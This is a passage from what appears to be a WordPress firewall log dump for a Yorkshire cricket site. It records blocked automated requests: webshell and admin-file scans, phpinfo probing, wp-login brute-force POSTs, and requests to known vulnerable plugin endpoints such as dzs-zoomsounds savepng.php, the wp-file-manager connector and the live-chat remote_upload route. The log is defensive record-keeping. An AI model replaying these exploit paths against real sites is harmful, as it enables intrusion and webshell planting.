.NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/admins.php\"}','bIM5Rw2sLt0WqcJdzTCKa8Oe',0,1673659220.8016,117,'','GET',403,0,700,0,1,'',0),('171.217.251.47',2883189551,'','https://yorkshirecricketboard.org.uk/newfile.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/newfile.php\"}','3GZ6EJ0kXevqbSInNQhsUd9a',0,1673659221.0796,121,'','GET',403,0,700,0,1,'',0),('125.65.228.235',2101470443,'','https://yorkshirecricketboard.org.uk/1234.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/1234.php\"}','8mcOAS4vZj5GhDsJ1BYPoKLM',0,1673659221.5626,95,'','GET',403,0,700,0,1,'',0),('110.190.176.131',1857990787,'','https://yorkshirecricketboard.org.uk/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/x.php\"}','gPJRrKFLpBD2NjYIXsTxncE1',0,1673659221.8201,108,'','GET',403,0,700,0,1,'',0),('182.135.116.59',3062330427,'','https://yorkshirecricketboard.org.uk/upload/demodata.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/upload\\/demodata.php\"}','zUv5O0Yd1ecHFCt9ZaI6KbrS',0,1673659222.6237,86,'','GET',403,0,700,0,1,'',0),('171.217.250.75',2883189323,'','https://yorkshirecricketboard.org.uk/upload/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/upload\\/admins.php\"}','kQjVNK1uqo78zSfZwEghUIpB',0,1673659222.6447,85,'','GET',403,0,700,0,1,'',0),('182.145.92.217',3062979801,'','https://yorkshirecricketboard.org.uk/template/a.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/a.php\"}','a0zOScJe6gIGdUqpy7xj1wh8',0,1673659223.2361,93,'','GET',403,0,700,0,1,'',0),('182.145.126.151',3062988439,'','https://yorkshirecricketboard.org.uk/template/admin.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/admin.php\"}','YgEIK387LpZTahljvVXndOGu',0,1673659225.7814,113,'','GET',403,0,700,0,1,'',0),('182.135.116.22',3062330390,'','https://yorkshirecricketboard.org.uk/template/wdf.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/wdf.php\"}','pSN1VWxTkJRFMOBLIGy6s7Kz',0,1673659225.8276,105,'','GET',403,0,700,0,1,'',0),('182.135.116.151',3062330519,'','https://yorkshirecricketboard.org.uk/template/1234.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/1234.php\"}','Is7WGvx2cn1YUpRKZDf4lw6t',0,1673659226.1017,130,'','GET',403,0,700,0,1,'',0),('182.135.116.68',3062330436,'','https://yorkshirecricketboard.org.uk/template/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/x.php\"}','E4rv2jTlb9BHuDmwoAe6pGzS',0,1673659226.1750,113,'','GET',403,0,700,0,1,'',0),('182.145.126.160',3062988448,'','https://yorkshirecricketboard.org.uk/wdf.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/wdf.php\"}','4oMgXuiyKmdZjf9BkWFTrtC2',0,1673659226.2114,107,'','GET',403,0,700,0,1,'',0),('125.65.229.214',2101470678,'','https://yorkshirecricketboard.org.uk/install/admin.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/install\\/admin.php\"}','k38LjnIvCw1m9VrMPpguHTsD',0,1673659226.4257,91,'','GET',403,0,700,0,1,'',0),('182.135.116.215',3062330583,'','https://yorkshirecricketboard.org.uk/template/nginx.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/nginx.php\"}','M7lvA5uXgjp184ybe6TODIHB',0,1673659226.4868,136,'','GET',403,0,700,0,1,'',0),('182.145.126.80',3062988368,'','https://yorkshirecricketboard.org.uk/template/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/1.php\"}','vxLtjCWicBbR5lkOdz2r0Zfm',0,1673659226.5596,133,'','GET',403,0,700,0,1,'',0),('182.135.116.172',3062330540,'','https://yorkshirecricketboard.org.uk/template/demodata.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/template\\/demodata.php\"}','vIRXct509lr7EPxw2ZuVCpF1',0,1673659226.7382,115,'','GET',403,0,700,0,1,'',0),('125.65.229.205',2101470669,'','https://yorkshirecricketboard.org.uk/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/apache.php\"}','bmTVWH83dX6EUzFAulrxJKnk',0,1673659227.1821,108,'','GET',403,0,700,0,1,'',0),('139.59.183.122',2335946618,'','https://yorkshirecricketboard.org.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Mi Note 10 Pro) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.106 Mobile Safari\\/537.36\"}','Dn9AvJCcaITe8o4xlOZNUWus',0,1673690148.9558,1098,'','GET',403,0,700,0,1,'',0),('5.188.62.21',96222741,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4758.11 Safari\\/537.36\"}','HdhCOZcr97qsAG3x1482XiRm',0,1673699599.7379,112,'','GET',403,0,520,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','yVmpf14ZrCaX6E9sJIjcMln7',0,1673700865.8977,97,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','ytWrBKisNI6EqQ1bk7wm2dpa',0,1673700866.2165,145,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/infophp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','An7sV6Od8vLgrRmY0KESpyBJ',0,1673700866.5959,103,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/php_info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','Y4oLcGpl8BngA1xF7UaPHidj',0,1673700866.9584,103,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/test.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','yFj6ms0DWxzgvUS4ai79Bcrn',0,1673700867.4343,109,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','es2Sqko8j5cBi47LhMvRYxlr',0,1673700868.2559,104,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/asdf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','lA3O5KPYb8X9Meigwr27G4qo',0,1673700868.5990,612,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/pinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','BPWFum7waxVGCM0gDLU19efp',0,1673700869.4547,116,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/phpversion.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','YTU0NLSls8VbWreRJdGk2HyM',0,1673700869.8166,97,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/time.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','ETF90Oe2rLv165ZVlCbYcJAd',0,1673700870.1718,124,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/index.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','kYmgLzUObKCD4E9J3612ixaH',0,1673700870.5306,119,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/temp.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','7WbVUH5XIe1alpTFOYhxPjwB',0,1673700870.8870,85,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/old_phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','VkGhb7u4X9dt1AqZoTYmNaEM',0,1673700871.1931,92,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/infos.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','PJ9u4Brpte6vAfZOG1iHyITY',0,1673700871.5045,90,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/linusadmin-phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','ZTO9vlGXc2mdxRVuCWwjyDQa',0,1673700871.8115,83,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/php-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','OMnvN2cD65WE0dtClmQwGkJ8',0,1673700872.1221,90,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/dashboard/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','2czqhVKMyHbmxa0dwvNgZ6Fs',0,1673700872.4444,94,'','GET',403,0,700,0,1,'',0),('172.104.8.119',2892499063,'','https://yorkshirecricketboard.org.uk/_profiler/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','EIZ52xtyJFpdHekcPOqh1wYv',0,1673700872.7603,91,'','GET',403,0,700,0,1,'',0),('38.54.112.246',641102070,'','https://yorkshirecricketboard.org.uk/wp-content/themes/twentytwentytwo/inc/patterns/library.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DPdzbq5e7wxWKpcvC8A2io6n',0,1673718218.1507,107,'','GET',403,0,700,0,1,'',0),('38.54.112.246',641102070,'','https://yorkshirecricketboard.org.uk/wp-content/themes/twentytwentytwo/inc/patterns/library.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gOovqTyuZVfFlnCSE8wMp70m',0,1673718218.9960,95,'','GET',403,0,700,0,1,'',0),('81.88.52.8',1364734984,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','fLg45cXw1mbnFGQP8St0iuBT',0,1673739876.6855,187,'','POST',403,0,600,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WAGEmQueSXUdRLCqBvjbOVZD',0,1673744011.1656,2463,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bdtIw01lpEuKkeTfGvFBHjz3',0,1673744025.7586,142,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','BTlF29JnaWhY5jRvPdwU47ZH',0,1673744032.0901,116,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','mdEQcR3DCau8VkMfG12Y9ZlH',0,1673744065.8920,188,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bkogry6N8sWaMPh2AJKExzpi',0,1673744069.2889,103,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/wp-engine.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SXUTWAsdmVCvw1HnbRPcxep0',0,1673744072.8537,193,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qntUI9Y7JK8zMjbWEamLoTv1',0,1673744073.9071,169,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HUtg0m9ST2oKFzDVqfOl3L61',0,1673744111.4685,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8ZOVrmITQK31UunxsakPJ6RB',0,1673744115.7380,148,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nhkI1FHloXzN2DYWPb308EVp',0,1673744120.2642,162,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9qCiAcSRKVnjyzWYah3FXTQo',0,1673744187.0147,131,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PqDmyJO4tITuMdZve3fN6HVb',0,1673744241.3606,222,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8uOiHM4vyNAaFDzkYlrIjSnR',0,1673744246.4633,167,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xADQdkcuO3r9NeVgXLWtEoqh',0,1673744268.9366,161,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-json/wp_live_chat_support/v1/remote_upload','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HE4P0wjb2FgxZe7yOiG8IJkY',0,1673744273.1156,140,'','GET',403,0,520,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/uploads/wp_live_chat/abruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WKVC3jklJxUqyz5ESHLsYMZX',0,1673744274.1871,101,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KeTEpX5wGuDg0zok9ca4UVxL',0,1673744379.9678,194,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','T0f2vyjmaEABkZSoqO7hpFJ3',0,1673744382.1900,121,'','GET',403,0,700,0,1,'',0),('195.154.184.235',3281697003,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Wy4g6kEOtR9jpLT5xB7MImld',0,1673748774.2395,325,'','POST',403,0,600,0,1,'',0),('159.223.168.91',2682234971,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','H8lfRZc6S29dbNvTi7wEr04z',0,1673753616.1659,2993,'','POST',403,0,600,0,1,'',0),('49.232.145.205',837325261,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','WAtBgQIZLEKTO3sa60CjX8zl',0,1673767151.8384,353,'','POST',403,0,600,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','O0doxsEfz7ZKy6YG8FHiXCVv',0,1673768573.8598,104,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6h01NekZBnTEJVQtMO7Po2ly',0,1673768574.5569,93,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 